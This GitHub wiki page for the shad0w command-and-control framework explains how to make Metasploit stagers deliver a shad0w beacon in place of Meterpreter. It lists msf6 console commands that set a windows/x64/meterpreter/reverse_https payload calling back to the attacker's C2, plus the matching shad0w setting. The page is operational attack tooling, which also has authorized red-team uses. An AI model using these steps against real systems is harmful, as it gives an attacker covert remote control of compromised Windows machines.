Skip to content

Catching Meterpreter Callbacks

Jump to bottom Edit New page
Lee Baird edited this page Jan 7, 2021 · 3 revisions

Instead of rewriting every Metasploit exploit and auxiliary module, I figured the more sane option would be to add support for Metasploit stagers. This allows you to load a shad0w beacon instead of Meterpreter. Doing this only requires a couple of extra steps.

  1. Make sure the LHOST and LPORT options point to the shad0w C2.
  2. Disable the default Metasploit payload handler.
  3. Set the exit function to none.
  4. Set the StagerURILength. This is important so that the C2 will be able to identify a Meterpreter stager callback. It can be set to any value. but you must remember it.
  5. It is only possible to stage a shad0w beacon over reverse_https stagers. The payload will need to be set to this.
msf6 > set DisablePayloadHandler true
msf6 > set EXITFUNC none
msf6 > set StagerURILength 1337
msf6 > set payload windows/x64/meterpreter/reverse_https
  1. Set the MsfUriSize variable in shad0w to the same value as StagerURILength in Metasploit.
shad0w ≫ set -v MsfUriSize -d 1337

When the Metasploit module is ran, if it executes successfully you will be receive a shad0w beacon.

run_exploit

listener

Add a custom footer
Add a custom sidebar
Clone this wiki locally